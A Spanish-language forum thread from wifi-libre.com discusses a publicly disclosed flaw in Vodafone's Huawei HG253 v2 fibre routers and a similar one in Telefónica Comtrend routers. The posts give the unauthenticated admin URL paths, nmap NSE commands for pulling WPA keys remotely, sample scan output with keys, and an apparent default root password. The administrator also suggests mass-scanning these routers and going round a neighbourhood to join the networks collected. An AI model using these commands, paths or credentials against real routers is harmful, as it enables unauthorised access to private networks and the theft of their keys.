Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.  

Paginas:: 1

#1 27-11-2015 19:16:06

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2)

Brecha en el nuevo punto de acceso Huawei HG253 v2 puesto en servicio por Vodafone para sus lineas de fibra óptica :
¡ Es posible acceder a información critica remotamente sin tener los credenciales para ello!  ("information disclosure")

vod_1.png

  No he tenido entre manos uno de estos "routers" pero si que he visto aparecer en los aires eSSID de vodafone con direcciones mac de Huawei.
Un forma de distinguir los de sus predecesores (los HG566a - vulnerables pixiedust y WPSPIN ) es observando la diferencia entre el eSSID y el bSSID

voda_2.jpg

Otra manera es echando un ojo a los PROBES en el apartado WPS
Los "viejos" HG56a llevan un chipset Ralink.
Los "nuevos"  HG253 v2 llevan esta vez un chipset Broadcom

voda_3.jpg

  El HG 253 v2 se parece muchísimo al HG566a : Es una "box" dónde el diseño prima sobre la eficiencia (ausencia de antenas externas, una tremenda estupidez). 

voda_4.jpg

  Un link de mucho interés :

  Conclusión : Las cosas no cambian con el paso de los años.
Vodafone sigue produciendo unos firmwares tremendamente restrictivos y con un nivel de seguridad pésimo.

  Centrémonos un rato sobre la brecha de seguridad publicada hoy por Vicen Dominguez en PacketStorm :

La Gula es pecado...
Y el HG 253s se come cualquier galleta

La brecha se explota de forma remota.
Es decir desde cualquier punto del globo utilizando la IP publica de los routers que tienen puertos abiertos hacía el exterior.
En este caso se usan los puertos 80 (http) y 443 (https?)
La brecha se debe a que varias paginas de la interfaz de configuración del routers tienen un bug a nivel de los certificados de autenticidad de los coockies.
Más que un bug es un falló completo : validan cualquier cosa y el router se "come" cualquier coockie
Estas son las paginas que podemos "bypassear" :

http://IPhtml_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg

Podemos así llegar sin problemas en estas paginas de la interfaz del objetivo y obtener información confidencial:

El autor lo hace con nmap y un script casero ("hua253s.nse"; compartido en github) 

nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Y recopila así información critica como la llave WPA de la red WiFi 

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s:
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP:
192.168.0.XX

  Es una brecha muy severa.
Se puede fácilmente lanzar un escaneo masivo y recopilar llaves WPA asociadas con una IP y un bSSID.
Luego se hace un poco de localización por IP...
...Y solo hace falta tener una bicicleta y un portátil para ir a entrometerse en todas las redes vodafone recopiladas en un barrio.

  La pregunta a mil €uros es si los puertos están abiertos sobre el exterior por defecto.
Si es así... Es un gran cagada porque sabemos que muy poc@s usari@s han ido a modificar los parámetros en su interfaz de configuración.

  Segunda pregunta, de menos importancia, es saber si se puede cambiar estos parámetros con la cuenta de usuario (ya que vodafone no da a sus usuarios los credenciales root pero los credenciales de user).
  Si no se puede esto hará que mas usuarios queden desprotegidos...
La contraseña root parece ser VF-EShg253

  El script es disponible en la rama github de DaniLabs :
scripts-nse/http-enum-vodafone-hua253s.nse

  Hablaré en otro tema de esta rama github de DaniLabs ya que aloja un par de scripts muy interesantes que explotan brechas similares en routers puestos en marcha por Telefónica...

Desconectado

#2 27-11-2015 22:36:31

mak074
Very Important Usuario

Registrado: 29-03-2015
Mensajes: 14

Re: Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2)

Hola crack..

Muy buen post...esperando que hables sobre los scripts de telefonica..

Un saludo..

Desconectado

#3 10-06-2017 18:31:55

juandingas
Usuario

Registrado: 28-03-2017
Mensajes: 3

Re: Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2)

No entiendo como funciona

Desconectado

#4 10-06-2017 19:16:22

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2)

No sé si la brecha ha sido arreglada o no.
Los routers tienen (tenían) el puerto 80 abierto sobre el exterior.
  Lo ves aquí: 

nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http

la primera linea es para lanzar nmap contra una IP publica desconocida
El resultado del scan dice que el puerto 80 está accesible.
Puedes acceder a la interfaz de configuración del dispositivo desde tu casa
Lo que no tienes es la contraseña que se te pide para entrar en la interfaz
....Pero...
   Resulta que hay un falló en la interfaz y que se puede acceder a  estas 3 URL

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

El script lo que hace es ir a estas tres páginas que no requieren credenciales (por error) para estar visitadas.
Copia la información interesante y la devuelve en consola.  

| http-enum-telefonica-comtrend-vg-8050:
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP:
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2:
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

Dirección mac del hardware, dirección  mac en la red local, eSSID, cifrado empleado y, lo más interesante, la llave WPA
PD: he pillado los resultados para un timofonica pero es la misma cosa con los voda...
Sacas la llave WPA visitando las paginas accesibles sin créditos.

Desconectado

#5 15-06-2017 15:21:42

Betis-Jesus
Very Important Usuario

Registrado: 29-03-2015
Mensajes: 556
Página Web

Re: Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2)

una cosa es intenta explotar la pass de route estudiando el firm y otras como este error tan simple con acceso a exterior que cualquiera puede explotar la brecha.

viver y ser libre

Desconectado

Paginas:: 1

Temas similares

Tema Respuestas Vistas Ultimo mensaje
¡Vienen grandes cambios! por Takomou
2 164 Hoy 15:25:52 por Patcher
Pegado:
Pegado:: Wireless Air Cut, auditoria del protocolo wps en Windows por Patcher  [ 1 2 3 21 ]
521 339979 10-05-2023 18:24:28 por Betis-Jesus
Hospital clinic dump por wifiyeah  [ 1 2 ]
27 1242 09-05-2023 21:32:44 por kcdtv
Hacktivismo por CHARGER22
1 205 08-05-2023 19:53:26 por kcdtv
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 18 ]
447 66089 22-04-2023 15:31:13 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: klurosu
Usuarios registrados conectados: 0
Invitados conectados: 7

Estadisticas de los foros

Número total de usuarios registrados: 2,446
Número total de temas: 1,637
Número total de mensajes: 15,586

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36

Usuarios en Línea hoy:
Patcher, kcdtv, Miguelillo0, El_P3dr0, ernestolaclau
© 2014-2022 Wifi-libre.com - [ Generated in 0.026 seconds ]